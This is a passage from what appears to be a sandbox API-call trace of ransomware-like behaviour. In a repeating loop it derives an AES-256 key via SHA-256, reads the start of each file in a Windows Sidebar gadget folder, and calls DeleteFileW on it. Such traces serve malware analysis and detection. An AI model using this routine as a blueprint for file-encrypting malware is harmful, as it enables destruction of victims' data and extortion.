phKey=0x326a4c4*=0x284d568) returned 1 [0188.666] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17d4 [0188.666] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.669] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.669] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.669] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.670] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_play.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_play.png")) returned 0 [0188.671] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.672] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.672] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.672] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.672] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb3 [0188.672] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.674] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.674] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.674] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.675] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_right_mousedown.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_right_mousedown.png")) returned 0 [0188.675] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.676] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.676] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.676] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.676] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb0 [0188.676] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.678] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.678] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.678] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.679] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_right_mouseout.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_right_mouseout.png")) returned 0 [0188.680] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.680] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.680] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.680] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.680] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb0 [0188.681] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.682] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.682] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.682] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.683] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_right_mouseover.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_right_mouseover.png")) returned 0 [0188.684] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.684] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.684] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.684] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.684] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x61ee [0188.685] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.688] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.688] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.688] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.690] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\default_thumb.jpg" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\default_thumb.jpg")) returned 0 [0188.690] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.691] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.691] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.691] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.691] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1682 [0188.691] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.694] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.694] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.694] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.695] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\ehshellLogo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\ehshelllogo.png")) returned 0 [0188.695] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.696] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.696] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.696] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.696] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2dd92 [0188.696] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.717] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.717] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.717] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.719] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\flyout_background.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\flyout_background.png")) returned 0 [0188.719] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.720] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.720] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.720] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.720] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5f6 [0188.720] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.722] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.722] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.722] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.724] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Flyout_Thumbnail_Shadow.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_flyout_thumbnail_shadow.png")) returned 0 [0188.724] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.725] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.725] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.725] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.725] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x24db4 [0188.725] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.734] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.734] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.734] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.735] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Main_Background_Loading.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_main_background_loading.png")) returned 0 [0188.735] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.736] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.736] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.736] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.736] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcf63 [0188.736] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.741] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.741] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.741] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.742] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Main_Background_QuickLaunch.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_main_background_quicklaunch.png")) returned 0 [0188.743] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.743] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.743] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.743] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.743] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x86e8 [0188.743] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.747] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.747] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.747] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.748] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Main_Gradient.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_main_gradient.png")) returned 0 [0188.751] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.751] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.751] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.751] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.751] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xff [0188.751] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.753] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.753] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.753] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.754] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Star_Empty.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_star_empty.png")) returned 0 [0188.754] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.755] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.755] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.755] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.755] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfc [0188.755] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.756] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.756] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.757] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.758] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Star_Full.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_star_full.png")) returned 0 [0188.758] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.759] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.759] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.759] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.759] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x104 [0188.759] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.760] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.760] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.760] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.761] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Star_Half.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_star_half.png")) returned 0 [0188.762] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.762] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.762] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.762] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.762] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12f9 [0188.762] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.765] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.765] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.765] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.766] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_Waitcursor.gif" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_waitcursor.gif")) returned 0 [0188.766] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.767] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.767] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.767] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.767] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3f3 [0188.767] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.769] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.769] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.769] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.770] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Gadget_WMC_LogoText.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\gadget_wmc_logotext.png")) returned 0 [0188.771] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.771] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.771] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.771] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.771] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd3d [0188.772] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.774] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.774] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.774] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.775] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\logo.png")) returned 0 [0188.775] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.776] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.776] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.776] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.776] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2f27 [0188.776] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.778] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.778] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.778] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.780] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\main_background.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\main_background.png")) returned 0 [0188.780] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0188.780] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.781] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.781] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.781] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.781] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xecdc [0188.781] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.785] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.785] 